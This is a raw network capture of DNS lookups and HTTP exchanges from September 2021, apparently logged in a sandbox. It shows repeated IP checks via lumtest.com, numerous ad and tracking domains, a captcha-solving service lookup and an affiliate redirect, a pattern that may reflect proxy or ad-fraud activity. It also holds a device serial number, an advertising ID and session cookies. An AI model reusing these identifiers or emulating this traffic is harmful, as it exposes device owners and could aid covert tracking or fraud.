ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSgizmodo.comRequestgizmodo.comIN AResponsegizmodo.comIN A151.101.194.166gizmodo.comIN A151.101.66.166gizmodo.comIN A151.101.130.166gizmodo.comIN A151.101.2.166
-
DNScheckip.kidsautoios.comRequestcheckip.kidsautoios.comIN AResponsecheckip.kidsautoios.comIN A103.47.192.108
-
GEThttp://checkip.kidsautoios.com/ip/index.php/api/ipRequestGET /ip/index.php/api/ip HTTP/1.1
Host: checkip.kidsautoios.com
Connection: keep-alive
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon (unknown version) CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
serial_number: FK1YN1YNHFLM
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:54 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.5.38
Set-Cookie: ci_session=BzEBOwBoDT5SK1V2VGpXZQRnBjcCc1tzAjUGdFUnUWxVaVdvAg4NNgEyBScLbQ13UmpVNgI0Bz4DclE5CD5SPVAxBD1Sa1U0ADBVNgBnDToHMQFlAGQNPVJhVT1UYlc3BGEGPQIzWzgCYgY%2FVTZRYVViVzMCZg1nAWcFJwttDXdSalU0AjYHPgNyUTMIK1JWUGMEYVI3VXMANlVwACANfQdrAXIAZw01UmJVP1RyV2UEYgY5An9bNgJhBilVY1E0VShXNAJgDX0BbQV2C2wNNVJgVT8CJAdxAyNRPwgpUlZQYwRiUjZVbwAnVSEAaA0sB2oBNwBsDT5SclVuVDlXMAQkBmkCMFtlAj0GaFU6USVVLld0Aj8NNAE4BWoLIQ1qUnBVcwJjB3YDI1EzCDRSZ1ArBCVSEFVHAB1VZgAnDSgHPwFzADYNK1JhVTRUYldsBHkGPQJ%2FWzECcAZDVTVRd1VxV2gCPw1wAWcFPAt4DTJSflU1AiQHPwMjUWAIalI6UDgEJ1I%2FVWAAIFV3AAwNPgczAXUANA1yUjlVcVQpV3YEbAZkAmtbMQJmBjRVZFE8VTRXMQJpDWYBYgU%2BCyUNPlJpVT8CJAdxAyNRPwgpUlZQZgRkUidVYABxVTgAIA1lB2ABOwB%2FDSZSa1V4; expires=Mon, 06-Sep-2021 11:34:54 GMT; Max-Age=7200; path=/
Content-Length: 12
Connection: close
Content-Type: application/json
-
DNScl3.apple.comRequestcl3.apple.comIN AResponsecl3.apple.comIN CNAMEcl3-cdn.origin-apple.com.akadns.netcl3-cdn.origin-apple.com.akadns.netIN CNAMEcl5.apple.com.edgekey.netcl5.apple.com.edgekey.netIN CNAMEe14868.dsce9.akamaiedge.nete14868.dsce9.akamaiedge.netIN A2.18.108.210
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:49 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSexey.ioRequestexey.ioIN AResponseexey.ioIN A104.21.18.39exey.ioIN A172.67.180.68
-
DNSyiopse.comRequestyiopse.comIN AResponseyiopse.comIN A104.21.21.177yiopse.comIN A172.67.199.171
-
DNStmearn.comRequesttmearn.comIN AResponsetmearn.comIN A104.21.13.169tmearn.comIN A172.67.200.218
-
DNSc.amazon-adsystem.comRequestc.amazon-adsystem.comIN AResponsec.amazon-adsystem.comIN CNAMEd1ykf07e75w7ss.cloudfront.netd1ykf07e75w7ss.cloudfront.netIN A52.222.142.111
-
DNSgizmodo.comRequestgizmodo.comIN AResponsegizmodo.comIN A151.101.2.166gizmodo.comIN A151.101.66.166gizmodo.comIN A151.101.194.166gizmodo.comIN A151.101.130.166
-
DNSf.kinja-static.comRequestf.kinja-static.comIN AResponsef.kinja-static.comIN CNAMEkinja-static.comkinja-static.comIN A151.101.194.166kinja-static.comIN A151.101.130.166kinja-static.comIN A151.101.66.166kinja-static.comIN A151.101.2.166
-
DNSsourcepoint.gizmodo.comRequestsourcepoint.gizmodo.comIN AResponsesourcepoint.gizmodo.comIN CNAMEcdn-1195.privacy-mgmt.comcdn-1195.privacy-mgmt.comIN A52.222.139.81cdn-1195.privacy-mgmt.comIN A52.222.139.55cdn-1195.privacy-mgmt.comIN A52.222.139.97cdn-1195.privacy-mgmt.comIN A52.222.139.109
-
DNScdn.speedcurve.comRequestcdn.speedcurve.comIN AResponsecdn.speedcurve.comIN CNAMEa3.shared.global.fastly.neta3.shared.global.fastly.netIN A151.101.2.217a3.shared.global.fastly.netIN A151.101.66.217a3.shared.global.fastly.netIN A151.101.130.217a3.shared.global.fastly.netIN A151.101.194.217
-
DNScdn.speedcurve.comRequestcdn.speedcurve.comIN AResponsecdn.speedcurve.comIN CNAMEa3.shared.global.fastly.neta3.shared.global.fastly.netIN A151.101.2.217a3.shared.global.fastly.netIN A151.101.66.217a3.shared.global.fastly.netIN A151.101.130.217a3.shared.global.fastly.netIN A151.101.194.217
-
DNSkinja.comRequestkinja.comIN AResponsekinja.comIN A151.101.2.166kinja.comIN A151.101.66.166kinja.comIN A151.101.194.166kinja.comIN A151.101.130.166
-
DNSsecurepubads.g.doubleclick.netRequestsecurepubads.g.doubleclick.netIN AResponsesecurepubads.g.doubleclick.netIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSscript-api.kinja.comRequestscript-api.kinja.comIN AResponsescript-api.kinja.comIN CNAMEscript-api.ccgateway.netscript-api.ccgateway.netIN CNAMEext-lb-aws-prod.ccgateway.netext-lb-aws-prod.ccgateway.netIN A52.91.215.149ext-lb-aws-prod.ccgateway.netIN A18.212.140.196ext-lb-aws-prod.ccgateway.netIN A3.237.175.195
-
DNShbx.media.netRequesthbx.media.netIN AResponsehbx.media.netIN A2.16.118.158
-
DNSi.kinja-img.comRequesti.kinja-img.comIN AResponsei.kinja-img.comIN CNAMEkinja-img.comkinja-img.comIN A151.101.194.166kinja-img.comIN A151.101.2.166kinja-img.comIN A151.101.66.166kinja-img.comIN A151.101.130.166
-
DNSx.kinja-static.comRequestx.kinja-static.comIN AResponsex.kinja-static.comIN CNAMEkinja-static.comkinja-static.comIN A151.101.2.166kinja-static.comIN A151.101.194.166kinja-static.comIN A151.101.130.166kinja-static.comIN A151.101.66.166
-
DNSconfiguration.apple.comRequestconfiguration.apple.comIN AResponseconfiguration.apple.comIN CNAMEconfiguration.apple.com.akadns.netconfiguration.apple.com.akadns.netIN CNAMEconfiguration.apple.com.edgekey.netconfiguration.apple.com.edgekey.netIN CNAMEe673.dsce9.akamaiedge.nete673.dsce9.akamaiedge.netIN A2.16.118.172
-
DNSjs-sec.indexww.comRequestjs-sec.indexww.comIN AResponsejs-sec.indexww.comIN CNAMEjs-sec.casalemedia.com.edgekey.netjs-sec.casalemedia.com.edgekey.netIN CNAMEe8037.g.akamaiedge.nete8037.g.akamaiedge.netIN A2.18.99.184
-
DNSf.kinja-static.comRequestf.kinja-static.comIN AResponsef.kinja-static.comIN CNAMEkinja-static.comkinja-static.comIN A151.101.130.166kinja-static.comIN A151.101.2.166kinja-static.comIN A151.101.66.166kinja-static.comIN A151.101.194.166
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSwww.clinique.comRequestwww.clinique.comIN AResponsewww.clinique.comIN CNAMEsan.clinique.com.edgekey.netsan.clinique.com.edgekey.netIN CNAMEe3243.x.akamaiedge.nete3243.x.akamaiedge.netIN A104.73.132.10
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsourcepoint.gizmodo.comRequestsourcepoint.gizmodo.comIN AResponsesourcepoint.gizmodo.comIN CNAMEcdn-1195.privacy-mgmt.comcdn-1195.privacy-mgmt.comIN A52.222.139.81cdn-1195.privacy-mgmt.comIN A52.222.139.55cdn-1195.privacy-mgmt.comIN A52.222.139.97cdn-1195.privacy-mgmt.comIN A52.222.139.109
-
DNSinsight.adsrvr.orgRequestinsight.adsrvr.orgIN AResponseinsight.adsrvr.orgIN CNAMEtracking-1715464556.eu-west-1.elb.amazonaws.comtracking-1715464556.eu-west-1.elb.amazonaws.comIN A54.246.44.247tracking-1715464556.eu-west-1.elb.amazonaws.comIN A52.49.191.174tracking-1715464556.eu-west-1.elb.amazonaws.comIN A34.252.183.11tracking-1715464556.eu-west-1.elb.amazonaws.comIN A18.202.51.91tracking-1715464556.eu-west-1.elb.amazonaws.comIN A54.195.66.206tracking-1715464556.eu-west-1.elb.amazonaws.comIN A52.211.216.77tracking-1715464556.eu-west-1.elb.amazonaws.comIN A99.81.115.16tracking-1715464556.eu-west-1.elb.amazonaws.comIN A52.208.91.187
-
DNSsb.scorecardresearch.comRequestsb.scorecardresearch.comIN AResponsesb.scorecardresearch.comIN A52.222.139.77sb.scorecardresearch.comIN A52.222.139.90sb.scorecardresearch.comIN A52.222.139.45sb.scorecardresearch.comIN A52.222.139.23
-
DNSstatic.chartbeat.comRequeststatic.chartbeat.comIN AResponsestatic.chartbeat.comIN CNAMEd3f7zc5bbfci5.cloudfront.netd3f7zc5bbfci5.cloudfront.netIN A13.227.217.7
-
DNSkinja-com.videoplayerhub.comRequestkinja-com.videoplayerhub.comIN AResponsekinja-com.videoplayerhub.comIN A104.21.192.119kinja-com.videoplayerhub.comIN A104.21.192.118
-
DNSadservice.google.comRequestadservice.google.comIN AResponseadservice.google.comIN A142.250.179.162
-
DNScdn-magiclinks.trackonomics.netRequestcdn-magiclinks.trackonomics.netIN AResponsecdn-magiclinks.trackonomics.netIN CNAMEd217yge8ytzcwv.cloudfront.netd217yge8ytzcwv.cloudfront.netIN A52.222.139.79d217yge8ytzcwv.cloudfront.netIN A52.222.139.48d217yge8ytzcwv.cloudfront.netIN A52.222.139.80d217yge8ytzcwv.cloudfront.netIN A52.222.139.82
-
DNSstatic.scroll.comRequeststatic.scroll.comIN AResponsestatic.scroll.comIN CNAMEe.sni.us-eu.fastly.nete.sni.us-eu.fastly.netIN A199.232.194.217e.sni.us-eu.fastly.netIN A199.232.198.217
-
DNScd.connatix.comRequestcd.connatix.comIN AResponsecd.connatix.comIN CNAMEk.sni.global.fastly.netk.sni.global.fastly.netIN A151.101.2.137k.sni.global.fastly.netIN A151.101.66.137k.sni.global.fastly.netIN A151.101.130.137k.sni.global.fastly.netIN A151.101.194.137
-
DNScdn.britepool.comRequestcdn.britepool.comIN AResponsecdn.britepool.comIN A52.222.139.86cdn.britepool.comIN A52.222.139.91cdn.britepool.comIN A52.222.139.11cdn.britepool.comIN A52.222.139.120
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsecurepubads.g.doubleclick.netRequestsecurepubads.g.doubleclick.netIN AResponsesecurepubads.g.doubleclick.netIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:57 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSwww.googleoptimize.comRequestwww.googleoptimize.comIN AResponsewww.googleoptimize.comIN A142.250.179.142
-
DNSscript-api.ccgateway.netRequestscript-api.ccgateway.netIN AResponsescript-api.ccgateway.netIN CNAMEext-lb-aws-prod.ccgateway.netext-lb-aws-prod.ccgateway.netIN A52.91.215.149ext-lb-aws-prod.ccgateway.netIN A18.212.140.196ext-lb-aws-prod.ccgateway.netIN A3.237.175.195
-
DNSaskmedia.technoratimedia.comRequestaskmedia.technoratimedia.comIN AResponseaskmedia.technoratimedia.comIN CNAMEadserver.technoratimedia.comadserver.technoratimedia.comIN CNAMEv02.cap-ash1.technoratimedia.comv02.cap-ash1.technoratimedia.comIN A150.136.25.38
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNSkrk.kargo.comRequestkrk.kargo.comIN AResponsekrk.kargo.comIN A3.216.96.138krk.kargo.comIN A3.233.169.27krk.kargo.comIN A52.71.50.199krk.kargo.comIN A52.205.123.115krk.kargo.comIN A3.224.202.137krk.kargo.comIN A3.223.147.57krk.kargo.comIN A107.21.0.187krk.kargo.comIN A107.22.61.52
-
DNScontextual.media.netRequestcontextual.media.netIN AResponsecontextual.media.netIN A2.16.118.158
-
DNSc.amazon-adsystem.comRequestc.amazon-adsystem.comIN AResponsec.amazon-adsystem.comIN CNAMEd1ykf07e75w7ss.cloudfront.netd1ykf07e75w7ss.cloudfront.netIN A52.222.142.111
-
DNSapi.rlcdn.comRequestapi.rlcdn.comIN AResponseapi.rlcdn.comIN A34.120.155.137
-
DNScdn-geuw1-xch.media.netRequestcdn-geuw1-xch.media.netIN AResponsecdn-geuw1-xch.media.netIN CNAMEwildcard.media.net.edgekey.netwildcard.media.net.edgekey.netIN CNAMEe607.e11.akamaiedge.nete607.e11.akamaiedge.netIN A23.62.140.165
-
DNSid.sv.rkdms.comRequestid.sv.rkdms.comIN AResponseid.sv.rkdms.comIN A3.215.64.185id.sv.rkdms.comIN A52.207.5.56
-
DNSpixel.rubiconproject.comRequestpixel.rubiconproject.comIN AResponsepixel.rubiconproject.comIN CNAMEpixel.rubiconproject.net.akadns.netpixel.rubiconproject.net.akadns.netIN A213.19.162.80pixel.rubiconproject.net.akadns.netIN A213.19.162.90
-
DNSmatch.adsrvr.orgRequestmatch.adsrvr.orgIN AResponsematch.adsrvr.orgIN CNAMEmatch-aga.adsrvr.orgmatch-aga.adsrvr.orgIN CNAMEa97adde81b00f2ca4.awsglobalaccelerator.coma97adde81b00f2ca4.awsglobalaccelerator.comIN A76.223.111.131a97adde81b00f2ca4.awsglobalaccelerator.comIN A13.248.242.197
-
DNSidx.liadm.comRequestidx.liadm.comIN AResponseidx.liadm.comIN CNAMEidaas-idx.us-east-1.elasticbeanstalk.comidaas-idx.us-east-1.elasticbeanstalk.comIN A3.234.8.236idaas-idx.us-east-1.elasticbeanstalk.comIN A3.95.140.237
-
DNSbtloader.comRequestbtloader.comIN AResponsebtloader.comIN A104.26.7.139btloader.comIN A172.67.70.134btloader.comIN A104.26.6.139
-
DNSassets.bounceexchange.comRequestassets.bounceexchange.comIN AResponseassets.bounceexchange.comIN CNAMEstatic.bounceexchange.comstatic.bounceexchange.comIN A34.98.72.95
-
DNSping.chartbeat.netRequestping.chartbeat.netIN AResponseping.chartbeat.netIN A54.88.192.18ping.chartbeat.netIN A34.202.90.242ping.chartbeat.netIN A54.163.236.63ping.chartbeat.netIN A54.197.115.220ping.chartbeat.netIN A75.101.166.189ping.chartbeat.netIN A52.44.184.111ping.chartbeat.netIN A44.197.35.129ping.chartbeat.netIN A52.87.81.15
-
DNStmearn.comRequesttmearn.comIN AResponsetmearn.comIN A104.21.13.169tmearn.comIN A172.67.200.218
-
DNStmearn.comRequesttmearn.comIN AResponsetmearn.comIN A172.67.200.218tmearn.comIN A104.21.13.169
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSkrk.kargo.comRequestkrk.kargo.comIN AResponsekrk.kargo.comIN A52.71.50.199krk.kargo.comIN A107.21.0.187krk.kargo.comIN A3.225.49.235krk.kargo.comIN A107.22.61.52krk.kargo.comIN A52.205.123.115krk.kargo.comIN A3.224.202.137krk.kargo.comIN A3.216.96.138krk.kargo.comIN A3.233.169.27
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:00 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNScds.connatix.comRequestcds.connatix.comIN AResponsecds.connatix.comIN CNAMEk.sni.global.fastly.netk.sni.global.fastly.netIN A151.101.2.137k.sni.global.fastly.netIN A151.101.66.137k.sni.global.fastly.netIN A151.101.130.137k.sni.global.fastly.netIN A151.101.194.137
-
DNSampcid.google.nlRequestampcid.google.nlIN AResponseampcid.google.nlIN A142.250.179.142
-
GEThttp://play.googleapis.com/generate_204RequestGET /generate_204 HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36
Host: play.googleapis.com
Accept-Encoding: gzip
ResponseHTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 06 Sep 2021 09:48:01 GMT
Connection: close
-
DNSncsa.sdapi.ioRequestncsa.sdapi.ioIN AResponsencsa.sdapi.ioIN CNAMEn.sdapi.io.edgekey.netn.sdapi.io.edgekey.netIN CNAMEe4330.dscx.akamaiedge.nete4330.dscx.akamaiedge.netIN A104.73.134.42
-
GEThttp://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=d3376969-9cc7-4681-b241-b5728f2a348e&may=84RequestGET /gooffer.php?aff_id=123&id_offer=3661&gaid=d3376969-9cc7-4681-b241-b5728f2a348e&may=84 HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SSB504R Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.90 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 06 Sep 2021 09:48:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://track.adxmel.com/aff_c?aid=1136301&oid=200580&aff_sub=Qum6waJ9oIbNFKtWc3Xq8v2f7TOyGV&advid=d3376969-9cc7-4681-b241-b5728f2a348e&source=452
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
-
DNSas-sec.casalemedia.comRequestas-sec.casalemedia.comIN AResponseas-sec.casalemedia.comIN CNAMEas-sec.casalemedia.com.edgekey.netas-sec.casalemedia.com.edgekey.netIN CNAMEe8037.g.akamaiedge.nete8037.g.akamaiedge.netIN A2.18.99.184
-
DNSp11.techlab-cdn.comRequestp11.techlab-cdn.comIN AResponsep11.techlab-cdn.comIN CNAMEsecure.chameleonx.com.edgekey.netsecure.chameleonx.com.edgekey.netIN CNAMEe37498.dsca.akamaiedge.nete37498.dsca.akamaiedge.netIN A96.16.53.202e37498.dsca.akamaiedge.netIN A96.16.53.216
-
DNSp11.techlab-cdn.comRequestp11.techlab-cdn.comIN AResponsep11.techlab-cdn.comIN CNAMEsecure.chameleonx.com.edgekey.netsecure.chameleonx.com.edgekey.netIN CNAMEe37498.dsca.akamaiedge.nete37498.dsca.akamaiedge.netIN A96.16.53.216e37498.dsca.akamaiedge.netIN A96.16.53.202
-
DNSp11.techlab-cdn.comRequestp11.techlab-cdn.comIN AResponsep11.techlab-cdn.comIN CNAMEsecure.chameleonx.com.edgekey.netsecure.chameleonx.com.edgekey.netIN CNAMEe37498.dsca.akamaiedge.nete37498.dsca.akamaiedge.netIN A96.16.53.202e37498.dsca.akamaiedge.netIN A96.16.53.216
-
DNSp11.techlab-cdn.comRequestp11.techlab-cdn.comIN AResponsep11.techlab-cdn.comIN CNAMEsecure.chameleonx.com.edgekey.netsecure.chameleonx.com.edgekey.netIN CNAMEe37498.dsca.akamaiedge.nete37498.dsca.akamaiedge.netIN A96.16.53.202e37498.dsca.akamaiedge.netIN A96.16.53.216
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
DNSsex.sexy-wife.comRequestsex.sexy-wife.comIN AResponsesex.sexy-wife.comIN CNAMEsexy-wife.comsexy-wife.comIN A167.86.103.60
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSad-delivery.netRequestad-delivery.netIN AResponsead-delivery.netIN A104.26.3.70ad-delivery.netIN A172.67.69.19ad-delivery.netIN A104.26.2.70
-
DNStrx-hub.comRequesttrx-hub.comIN AResponsetrx-hub.comIN A52.222.139.52trx-hub.comIN A52.222.139.44trx-hub.comIN A52.222.139.48trx-hub.comIN A52.222.139.59
-
DNSdata.cdnbasket.netRequestdata.cdnbasket.netIN AResponsedata.cdnbasket.netIN A35.227.245.214
-
DNS111.t.keepitpumpin.ioRequest111.t.keepitpumpin.ioIN AResponse111.t.keepitpumpin.ioIN A212.83.141.61
-
DNSview.cdnbasket.netRequestview.cdnbasket.netIN AResponseview.cdnbasket.netIN A35.227.232.148
-
DNSimasdk.googleapis.comRequestimasdk.googleapis.comIN AResponseimasdk.googleapis.comIN A142.250.179.202
-
DNSpage.cdnbasket.netRequestpage.cdnbasket.netIN AResponsepage.cdnbasket.netIN A35.190.86.194
-
DNSprivacy-location-edge.ccgateway.netRequestprivacy-location-edge.ccgateway.netIN AResponseprivacy-location-edge.ccgateway.netIN CNAMEext-lb-aws-prod.ccgateway.netext-lb-aws-prod.ccgateway.netIN A52.91.215.149ext-lb-aws-prod.ccgateway.netIN A18.212.140.196ext-lb-aws-prod.ccgateway.netIN A3.237.175.195
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.154stats.l.doubleclick.netIN A173.194.69.157stats.l.doubleclick.netIN A173.194.69.156
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A18.117.4.157capi.connatix.comIN A18.116.58.214capi.connatix.comIN A52.15.107.106capi.connatix.comIN A18.218.217.49capi.connatix.comIN A18.220.235.206capi.connatix.comIN A3.133.60.139capi.connatix.comIN A52.14.23.146capi.connatix.comIN A18.116.127.165
-
DNSfurricity-nursubaru.xyzRequestfurricity-nursubaru.xyzIN AResponsefurricity-nursubaru.xyzIN A3.225.140.174
-
DNSblock.scroll.comRequestblock.scroll.comIN AResponseblock.scroll.comIN CNAMEe.sni.us-eu.fastly.nete.sni.us-eu.fastly.netIN A199.232.194.217e.sni.us-eu.fastly.netIN A199.232.198.217
-
DNSids.cdnwidget.comRequestids.cdnwidget.comIN AResponseids.cdnwidget.comIN A130.211.47.17
-
DNSapi.btloader.comRequestapi.btloader.comIN AResponseapi.btloader.comIN A130.211.23.194
-
DNScutpaid.comRequestcutpaid.comIN AResponsecutpaid.comIN A172.67.183.8cutpaid.comIN A104.21.48.87
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A18.116.127.165capi.connatix.comIN A18.190.140.105capi.connatix.comIN A3.22.107.131capi.connatix.comIN A3.22.136.188capi.connatix.comIN A18.221.6.186capi.connatix.comIN A18.116.58.214capi.connatix.comIN A3.133.60.139capi.connatix.comIN A18.117.4.157
-
DNSimg.connatix.comRequestimg.connatix.comIN AResponseimg.connatix.comIN CNAMEk.sni.global.fastly.netk.sni.global.fastly.netIN A151.101.2.137k.sni.global.fastly.netIN A151.101.66.137k.sni.global.fastly.netIN A151.101.130.137k.sni.global.fastly.netIN A151.101.194.137
-
DNSs.srvsynd.comRequests.srvsynd.comIN AResponses.srvsynd.comIN A52.212.133.238s.srvsynd.comIN A18.203.213.28s.srvsynd.comIN A52.17.239.19s.srvsynd.comIN A18.202.153.141s.srvsynd.comIN A34.243.93.43s.srvsynd.comIN A52.19.198.230s.srvsynd.comIN A18.203.131.238s.srvsynd.comIN A34.240.117.131s.srvsynd.comIN A18.203.96.5s.srvsynd.comIN A18.203.192.182
-
DNSvid.connatix.comRequestvid.connatix.comIN AResponsevid.connatix.comIN CNAMEk.sni.global.fastly.netk.sni.global.fastly.netIN A151.101.2.137k.sni.global.fastly.netIN A151.101.66.137k.sni.global.fastly.netIN A151.101.130.137k.sni.global.fastly.netIN A151.101.194.137
-
DNSpd.cdnwidget.comRequestpd.cdnwidget.comIN AResponsepd.cdnwidget.comIN A34.107.221.36
-
DNSexey.ioRequestexey.ioIN AResponseexey.ioIN A172.67.180.68exey.ioIN A104.21.18.39
-
DNSs.go-mpulse.netRequests.go-mpulse.netIN AResponses.go-mpulse.netIN CNAMEip46.go-mpulse.net.edgekey.netip46.go-mpulse.net.edgekey.netIN CNAMEe4518.dscx.akamaiedge.nete4518.dscx.akamaiedge.netIN A104.80.224.132
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
